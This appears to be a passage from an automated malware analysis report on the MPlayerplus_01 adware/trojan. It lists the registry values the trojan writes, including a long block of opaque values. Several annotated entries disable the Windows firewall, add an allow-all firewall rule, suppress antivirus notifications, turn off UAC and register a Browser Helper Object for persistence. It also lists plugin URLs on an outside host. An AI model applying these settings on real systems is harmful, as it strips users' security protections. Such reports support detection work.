"a2_891" = "2092714022"
"a2_438" = "3140070341"
"a2_439" = "3147249469"
"a2_434" = "3111391071"
"a2_435" = "3118565545"
"a2_436" = "3125728575"
"a2_437" = "3132914197"
"a2_430" = "3082715484"
"a2_431" = "3089882210"
"a2_432" = "3097067457"
"a2_433" = "3104236944"
"a4_986" = "2773786010"
"a2_948" = "2501356747"
"a2_949" = "2508522125"
"a4_908" = "2214594572"
"a2_944" = "2472674973"
"a2_945" = "2479860457"
"a2_946" = "2487022581"
"a2_947" = "2494188532"
"a2_940" = "2444015358"
"a1_488" = "3598837643"
"a2_942" = "2458337753"
"a2_943" = "2465519199"
"a1_279" = "2521011211"
"a1_278" = "4141055257"
"a1_489" = "3229368213"
"a1_271" = "1267188980"
"a1_270" = "2073913122"
"a1_273" = "4066722233"
"a1_272" = "3370151499"
"a1_275" = "1782524004"
"a1_274" = "2818498807"
"a1_277" = "2666444460"
"a1_276" = "2974914798"
"a2_764" = "1182239251"
"a2_765" = "1189402124"
"a2_766" = "1196576057"
"a2_767" = "1203743762"
"a2_760" = "1153556075"
"a2_761" = "1160724770"
"a2_762" = "1167908253"
"a2_763" = "1175074724"
"a2_768" = "1210922634"
"a2_769" = "1218092162"
"a2_382" = "2738606545"
"a2_383" = "2745774280"
"a2_380" = "2724259299"
"a2_381" = "2731427550"
"a2_386" = "2767275061"
"a2_387" = "2774444074"
"a2_384" = "2752939567"
"a2_385" = "2760108485"
"a2_388" = "2781625609"
"a2_389" = "2788790316"
"a1_613" = "2704017407"
"a1_612" = "956973146"
"a1_611" = "1981677048"
"a2_368" = "2638238288"
"a2_369" = "2645406966"
"a1_610" = "1803759529"
"a2_88" = "630889637"
"a2_89" = "638056670"
"a2_84" = "602197076"
"a2_85" = "609382454"
"a2_86" = "616537436"
"a2_87" = "623707906"
"a2_80" = "573523498"
"a2_81" = "580705132"
"a2_82" = "587873370"
"a2_83" = "595040087"
"a3_273" = "1974165848"
"a3_272" = "1966722361"
"a3_271" = "1926113414"
"a3_270" = "1918678119"
"a3_277" = "2002712284"
"a3_276" = "1962103485"
"a3_275" = "1954659866"
"a3_274" = "1947600379"
"a2_162" = "1161404297"
"a2_163" = "1168569041"
"a3_279" = "1983582110"
"a3_278" = "2009623423"
"a2_166" = "1190071936"
"a2_167" = "1197236402"
"a2_164" = "1175737608"
"a2_165" = "1182903514"
"a3_690" = "668723035"
"a3_679" = "589715310"
"a1_666" = "2736939137"
"a3_677" = "541662892"
"a3_676" = "568228365"
"a3_675" = "560775658"
"a3_674" = "553725259"
"a3_673" = "513247528"
"a3_672" = "505681033"
"a3_671" = "532246550"
"a3_670" = "525328375"
"a3_50" = "341766363"
"a3_51" = "348755322"
"a3_52" = "389745053"
"a3_53" = "396796476"
"a3_54" = "370165343"
"a3_55" = "377748222"
"a3_56" = "384737041"
"a3_57" = "425210800"
"a3_58" = "432789459"
"a3_59" = "406145138"
"a3_417" = "3006523432"
"a3_416" = "2965403529"
"a3_415" = "2958480150"
"a3_414" = "2984984311"
"a3_413" = "2977536596"
"a3_412" = "2970543669"
"a3_411" = "2929937810"
"a3_410" = "2922490227"
"a3_419" = "2986877162"
"a3_418" = "3013512267"
"a1_451" = "768789334"
"a1_450" = "1259985985"
"a1_453" = "3787616907"
"a1_452" = "3565682170"
"a1_455" = "1463617809"
"a1_454" = "1640855387"
"a1_457" = "94119212"
"a1_456" = "1507591614"
"a1_459" = "3729966625"
"a1_458" = "1489588020"
"a1_693" = "2593998566"
"a1_692" = "1549938400"
"a1_691" = "1461325377"
"a1_690" = "2042865195"
"a1_697" = "3322133708"
"a1_696" = "2213224661"
"a1_695" = "2581710566"
"a1_694" = "1188442584"
"a1_699" = "3897448581"
"a1_698" = "663177507"
"a3_896" = "2145139113"
"a3_695" = "704178558"
"a1_962" = "4006488455"
"a3_309" = "2231976764"
"a3_308" = "2191503005"
"a3_303" = "2155521254"
"a3_302" = "2148466759"
"a3_301" = "2174512164"
"a3_300" = "2167589765"
"a3_307" = "2183924346"
"a3_306" = "2210566619"
"a3_305" = "2203581880"
"a3_304" = "2162448665"
"a4_86" = "616544406"
"a4_87" = "623713527"
"a4_84" = "602206164"
"a4_85" = "609375285"
"a4_82" = "587867922"
"a4_83" = "595037043"
"a4_80" = "573529680"
"a4_81" = "580698801"
"a3_887" = "2047190590"
"a3_730" = "921917107"
"a4_88" = "630882648"
"a4_89" = "638051769"
"a3_731" = "962513618"
"a4_954" = "2544374138"
[HKCU\Software\Aas\695404737]
"14338242" = "0"
[HKCU\Software\Aas]
"a3_913" = "2267125720"
"a3_736" = "998505673"
"a1_740" = "564684596"
"a3_737" = "1005490536"
"a3_697" = "685057584"
"a3_892" = "2083171285"
"a3_891" = "2109683634"
"a3_890" = "2102235923"
"a3_897" = "2119163336"
"a3_734" = "950445111"
"a3_895" = "2138211638"
"a3_894" = "2131222679"
"a3_899" = "2166680202"
"a3_735" = "990926934"
"a3_696" = "678137233"
"a1_967" = "2909918424"
"a4_387" = "2774449827"
"a1_940" = "124804754"
"a1_752" = "904449354"
"a4_629" = "214409813"
"a4_628" = "207240692"
"a4_627" = "200071571"
"a4_626" = "192902450"
"a4_625" = "185733329"
"a4_624" = "178564208"
"a4_623" = "171395087"
"a4_622" = "164225966"
"a4_621" = "157056845"
"a4_620" = "149887724"
"a2_75" = "537687692"
"a2_74" = "530518417"
"a2_77" = "552013932"
"a2_76" = "544854752"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Aas]
"a2_71" = "509004071"
"a2_70" = "501837017"
"a4_753" = "1103380817"
"a4_752" = "1096211696"
"a4_751" = "1089042575"
"a4_750" = "1081873454"
"a4_757" = "1132057301"
"a2_73" = "523339198"
"a4_755" = "1117719059"
"a4_754" = "1110549938"
"a1_877" = "2224352082"
"a1_876" = "3408463319"
"a4_759" = "1146395543"
"a2_72" = "516171632"
"a1_873" = "2942683606"
"a1_872" = "2062266677"
"a1_871" = "403968041"
"a1_870" = "278559445"
"a4_195" = "1397978595"
"a4_194" = "1390809474"
"a4_197" = "1412316837"
"a4_196" = "1405147716"
"a4_191" = "1369302111"
"a4_190" = "1362132990"
"a4_193" = "1383640353"
"a4_192" = "1376471232"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_198" = "1419485958"
"a1_909" = "3646407707"
"a4_179" = "1283272659"
"a4_178" = "1276103538"
"a4_173" = "1240257933"
"a4_172" = "1233088812"
"a4_171" = "1225919691"
"a4_170" = "1218750570"
"a4_177" = "1268934417"
"a4_176" = "1261765296"
"a4_175" = "1254596175"
"a4_174" = "1247427054"
"a4_577" = "4136582817"
"a3_123" = "898388146"
"a4_575" = "4122244575"
"a4_574" = "4115075454"
"a4_573" = "4107906333"
"a4_572" = "4100737212"
"a4_571" = "4093568091"
"a3_122" = "891468819"
"a4_970" = "2659080074"
"a3_121" = "850861040"
"a4_579" = "4150921059"
"a4_578" = "4143751938"
"a4_289" = "2071875969"
"a4_288" = "2064706848"
"a3_636" = "247859925"
"a3_120" = "843343697"
"a4_985" = "2766616889"
"a4_281" = "2014523001"
"a4_280" = "2007353880"
"a4_283" = "2028861243"
"a1_108" = "4204072095"
"a4_285" = "2043199485"
"a4_284" = "2036030364"
"a4_287" = "2057537727"
"a3_126" = "886312343"
"a3_125" = "879323508"
"a3_124" = "905966805"
"a4_965" = "2623234469"
"a3_691" = "642161658"
"a3_967" = "2620735566"
"a4_379" = "2717096859"
"a4_378" = "2709927738"
"a3_966" = "2647370799"
"a4_375" = "2688420375"
"a4_374" = "2681251254"
"a4_377" = "2702758617"
"a4_376" = "2695589496"
"a4_371" = "2659743891"
"a4_370" = "2652574770"
"a4_373" = "2674082133"
"a4_372" = "2666913012"
"a3_964" = "2599327597"
"a3_963" = "2592338634"
"a3_962" = "2584764075"
"a4_756" = "1124888180"
"a3_961" = "2611395080"
"a1_755" = "757558379"
"a1_437" = "3950345627"
"a3_960" = "2604335593"
"a2_553" = "3964522084"
"a2_552" = "3957353358"
"a2_551" = "3950188078"
"a2_550" = "3943019981"
"a2_557" = "3993205085"
"a2_556" = "3986038487"
"a2_555" = "3978856756"
"a2_554" = "3971686444"
"a2_889" = "2078378862"
"a2_888" = "2071211839"
"a2_559" = "4007552102"
"a2_558" = "4000372335"
"a4_980" = "2730771284"
"a4_981" = "2737940405"
"a2_429" = "3075548100"
"a2_428" = "3068380269"
"a2_427" = "3061215424"
"a2_426" = "3054047304"
"a2_425" = "3046882447"
"a2_424" = "3039715751"
"a2_423" = "3032533247"
"a2_422" = "3025360849"
"a2_421" = "3018196467"
"a2_420" = "3011032283"
"a1_758" = "1754844564"
"a2_565" = "4050558862"
"a4_984" = "2759447768"
"a2_959" = "2580225733"
"a2_958" = "2573056267"
"a2_957" = "2565875857"
"a2_956" = "2558709059"
"a2_955" = "2551541426"
"a2_954" = "2544371781"
"a1_785" = "1683585743"
"a2_952" = "2530044831"
"a2_951" = "2522872041"
"a2_950" = "2515692188"
"a1_208" = "1656467482"
"a1_209" = "4021100329"
"a1_204" = "2253572951"
"a1_205" = "3196334048"
"a1_206" = "619130488"
"a1_207" = "893248721"
"a1_200" = "3060331266"
"a1_201" = "2088473965"
"a1_202" = "2824622804"
"a1_203" = "1042089652"
"a2_777" = "1275441540"
"a2_776" = "1268277138"
"a2_775" = "1261106512"
"a2_774" = "1253924873"
"a2_773" = "1246758484"
"a2_772" = "1239591506"
"a2_771" = "1232423508"
"a2_770" = "1225260712"
"a2_779" = "1289776841"
"a2_778" = "1282610957"
"a2_395" = "2831795297"
"a2_394" = "2824625725"
"a2_397" = "2846144490"
"a2_396" = "2838978507"
"a2_391" = "2803126088"
"a2_390" = "2795948357"
"a2_393" = "2817458538"
"a2_392" = "2810283261"
"a2_399" = "2860476050"
"a2_398" = "2853312370"
"a2_568" = "4072055293"
"a2_569" = "4079223173"
"a2_379" = "2717090178"
"a2_378" = "2709919519"
"a2_373" = "2674086426"
"a2_372" = "2666906146"
"a2_371" = "2659737060"
"a2_370" = "2652572946"
"a2_377" = "2702754896"
"a2_376" = "2695590851"
"a2_375" = "2688428236"
"a2_374" = "2681256934"
"a3_246" = "1746738975"
"a3_247" = "1753789374"
"a3_244" = "1765852765"
"a3_245" = "1773304572"
"a2_179" = "1283263928"
"a2_178" = "1276105781"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKCU\Software\Aas]
"a3_241" = "1744311672"
"a2_175" = "1254604356"
"a2_174" = "1247421497"
"a2_177" = "1268925500"
"a2_176" = "1261771010"
"a2_171" = "1225922532"
"a2_170" = "1218754415"
"a2_173" = "1240265208"
"a3_249" = "1801832560"
"a4_960" = "2587388864"
"a1_510" = "2782891625"
"a1_511" = "3422850134"
"a1_512" = "3417463123"
"a1_513" = "812705232"
"a1_514" = "782791804"
"a1_515" = "1089708398"
"a1_516" = "832078906"
"a1_517" = "960272570"
"a1_518" = "1262482227"
"a1_519" = "3564583657"
"a3_648" = "367361953"
"a3_649" = "340792256"
"a3_69" = "478110732"
"a3_68" = "470664173"
"a3_65" = "449123976"
"a3_64" = "442135145"
"a3_67" = "497168202"
"a3_66" = "489720619"
"a3_61" = "454263092"
"a3_60" = "413199509"
"a3_63" = "468244982"
"a3_62" = "461186391"
"a1_784" = "4201887253"
"a3_514" = "3667976427"
"a2_543" = "3892834562"
"a1_424" = "3960533723"
"a1_425" = "1694070208"
"a1_426" = "1031169086"
"a1_427" = "2784433783"
"a1_420" = "3457835889"
"a1_421" = "2441181395"
"a1_422" = "2734773844"
"a1_423" = "877897234"
"a3_199" = "1409969486"
"a1_428" = "508332305"
"a1_429" = "3440102361"
"a3_515" = "3709043978"
"a3_693" = "690213052"
"a2_965" = "2623240406"
"a3_338" = "2439897659"
"a3_339" = "2446886490"
"a3_336" = "2391856505"
"a3_337" = "2432846232"
"a3_334" = "2411437223"
"a3_335" = "2384801990"
"a3_332" = "2363312101"
"a3_333" = "2403923972"
"a3_330" = "2348814115"
"a3_331" = "2356388674"
"a1_738" = "2113515479"
"a1_739" = "899526229"
"a3_428" = "3084957701"
"a3_429" = "3058850980"
"a3_422" = "3041926607"
"a3_423" = "3049502318"
"a3_420" = "2994455821"
"a3_421" = "3001383340"
"a3_426" = "3070911299"
"a3_427" = "3077900258"
"a3_424" = "3022858881"
"a3_425" = "3029913376"
"a1_864" = "1298648191"
"a2_915" = "2264784744"
"a1_865" = "1336638331"
"a4_870" = "1942167974"
"a4_873" = "1963675337"
"a1_863" = "106238114"
"a3_87" = "607024862"
"a3_86" = "633131711"
"a3_85" = "626081308"
"a3_84" = "585598461"
"a3_83" = "578085210"
"a3_82" = "571034939"
"a3_81" = "597665944"
"a4_183" = "1311949143"
"a3_89" = "654610320"
"a3_88" = "614067057"
"a4_612" = "92534756"
"a4_613" = "99703877"
"a4_610" = "78196514"
"a4_611" = "85365635"
"a4_616" = "121211240"
"a4_617" = "128380361"
"a4_614" = "106872998"
"a4_615" = "114042119"
"a4_968" = "2644741832"
"a4_969" = "2651910953"
"a4_618" = "135549482"
"a4_619" = "142718603"
"a4_871" = "1949337095"
"a1_990" = "2930124718"
"a1_991" = "3206315524"
"a1_992" = "2149294888"
"a1_993" = "3140918015"
"a3_689" = "661144376"
"a3_812" = "1543047557"
"a3_692" = "649083933"
"a4_876" = "1985182700"
"a4_766" = "1196579390"
"a4_767" = "1203748511"
"a4_764" = "1182241148"
"a4_765" = "1189410269"
"a4_762" = "1167902906"
"a4_763" = "1175072027"
"a4_760" = "1153564664"
"a4_761" = "1160733785"
"a1_848" = "2776303391"
"a1_849" = "3994541413"
"a1_439" = "434358251"
"a4_768" = "1210917632"
"a4_769" = "1218086753"
"a3_938" = "2446500163"
"a3_512" = "3687557161"
"a2_662" = "450988867"
"a3_513" = "3660926024"
"a3_930" = "2355479115"
"a3_931" = "2362926826"
"a3_932" = "2403474189"
"a3_814" = "1523992135"
"a4_877" = "1992351821"
"a3_510" = "3639513879"
"a3_936" = "2398382209"
"a3_937" = "2439449888"
"a3_511" = "3679991734"
"a3_516" = "3715971501"
"a3_517" = "3723025868"
"a1_198" = "1981739218"
"a1_199" = "280983471"
"a4_148" = "1061029908"
"a4_149" = "1068199029"
"a4_146" = "1046691666"
"a4_147" = "1053860787"
"a1_196" = "1047090753"
"a4_145" = "1039522545"
"a1_190" = "3390637483"
"a4_143" = "1025184303"
"a4_140" = "1003676940"
"a4_141" = "1010846061"
"a2_983" = "2752275724"
"a3_910" = "2245638887"
"a4_548" = "3928678308"
"a4_549" = "3935847429"
"a4_542" = "3885663582"
"a4_543" = "3892832703"
"a4_540" = "3871325340"
"a4_541" = "3878494461"
"a4_546" = "3914340066"
"a4_547" = "3921509187"
"a4_544" = "3900001824"
"a4_545" = "3907170945"
"a4_839" = "1719925223"
"a1_662" = "3964198130"
"a1_663" = "1386010181"
"a3_965" = "2639793036"
"a1_660" = "2754066505"
"a4_380" = "2724265980"
"a4_381" = "2731435101"
"a4_382" = "2738604222"
"a4_383" = "2745773343"
"a4_384" = "2752942464"
"a4_385" = "2760111585"
"a4_386" = "2767280706"
"a4_169" = "1211581449"
"a4_388" = "2781618948"
"a4_389" = "2788788069"
"a1_667" = "2151300874"
"a1_664" = "1876590376"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
[HKCU\Software\Aas]
"a1_665" = "1572439772"
"a1_0" = "3585464105"
"a1_1" = "2574657836"
"a1_2" = "1517877764"
"a1_3" = "1534863684"
"a1_4" = "2284461646"
"a1_5" = "873603255"
"a1_6" = "3309449020"
"a1_7" = "580567579"
"a1_8" = "3425761333"
"a1_9" = "1293884215"
"a2_566" = "4057723868"
"a2_567" = "4064899676"
"a2_564" = "4043386927"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Aas]
"a2_562" = "4029054709"
"a2_563" = "4036222550"
"a3_8" = "40388897"
"a3_9" = "47967552"
"a3_6" = "59977839"
"a3_7" = "67032206"
"a3_4" = "11991981"
"a3_5" = "52535244"
"a3_2" = "31040235"
"a3_3" = "4933386"
"a3_0" = "17001001"
"a3_1" = "23989832"
"a2_412" = "2953679701"
"a2_413" = "2960845726"
"a2_410" = "2939344330"
"a2_411" = "2946513886"
"a2_416" = "2982349252"
"a2_417" = "2989528480"
"a2_414" = "2968013523"
"a2_415" = "2975182067"
"a2_418" = "2996695491"
"a2_419" = "3003864211"
"a2_962" = "2601724165"
"a2_963" = "2608890976"
"a2_960" = "2587393439"
"a2_961" = "2594556996"
"a2_966" = "2630406154"
"a2_967" = "2637577614"
"a2_964" = "2616058697"
"a4_950" = "2515697654"
"a1_631" = "1931423917"
"a2_968" = "2644743203"
"a2_969" = "2651909497"
"a4_564" = "4043384244"
"a1_219" = "3474215229"
"a1_218" = "2899928608"
"a1_217" = "1610887303"
"a1_216" = "3194505444"
"a1_215" = "4279908441"
"a1_214" = "3277471311"
"a1_213" = "231512426"
"a1_212" = "2658694378"
"a1_211" = "522556586"
"a1_210" = "1739335849"
"a2_988" = "2788126984"
"a2_989" = "2795302775"
"a4_567" = "4064891607"
"a1_630" = "1814769928"
"a2_980" = "2730775007"
"a4_560" = "4014707760"
"a2_982" = "2745111990"
"a4_956" = "2558712380"
"a2_984" = "2759443310"
"a2_985" = "2766611470"
"a2_986" = "2773781237"
"a4_561" = "4021876881"
"a4_562" = "4029046002"
"a3_991" = "2792683862"
"a4_563" = "4036215123"
"a4_443" = "3175920603"
"a1_633" = "4012700066"
"a4_442" = "3168751482"
"a4_441" = "3161582361"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
The process regsvr32.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"
[HKCR\CrossriderApp0054246.Sandbox.1]
"(Default)" = "CrossriderApp0054246.Sandbox"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories]
"(Default)" = ""
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"
[HKCR\CrossriderApp0054246.Sandbox\CurVer]
"(Default)" = "CrossriderApp0054246.Sandbox"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\0\win32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}]
"(Default)" = "MPlayerplus_01"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CrossriderApp0054246.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421146}"
[HKCR\CrossriderApp0054246.BHO\CurVer]
"(Default)" = "CrossriderApp0054246"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\ProgID]
"(Default)" = "CrossriderApp0054246.BHO.1"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0]
"(Default)" = "CrossriderApp0054246 Type Library"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054246.Sandbox"
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054246"
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}]
"(Default)" = "ISandBox"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\HELPDIR]
"(Default)" = "%Program Files%\MPlayerplus_01"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\ProgID]
"(Default)" = "CrossriderApp0054246.Sandbox.1"
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0054246.BHO]
"(Default)" = "CrossriderApp0054246"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CrossriderApp0054246.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422246}"
[HKCR\CrossriderApp0054246.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421146}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 7A 5B 03 6F 08 2D F2 01 06 02 6B 4F 62 64 84"
[HKCR\CrossriderApp0054246.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422246}"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}]
"(Default)" = "CrossriderApp0054246.Sandbox"
[HKCR\CrossriderApp0054246.BHO.1]
"(Default)" = "CrossriderApp0054246"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}]
"(Default)" = "ICrossriderBHO"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0054246.Sandbox]
"(Default)" = "CrossriderApp0054246.Sandbox"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421146}]
"(Default)" = "CrossriderApp0054246"
"NoExplorer" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421146}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\TypeLib]
The process dwwin.exe:3088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 82 33 8A 31 08 97 0D FF DB BB 2B F9 71 E3 4F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process MPlayerplus_01-codedownloader.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\MPlayerplus_01\Plugins\246]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/246.js"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\MPlayerplus_01\Plugins\192]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/192.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\MPlayerplus_01\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/13.js"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/78.js"
[HKCU\Software\MPlayerplus_01\Plugins\262]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"Version" = "15"
[HKCU\Software\MPlayerplus_01\Plugins\281]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/281.js"
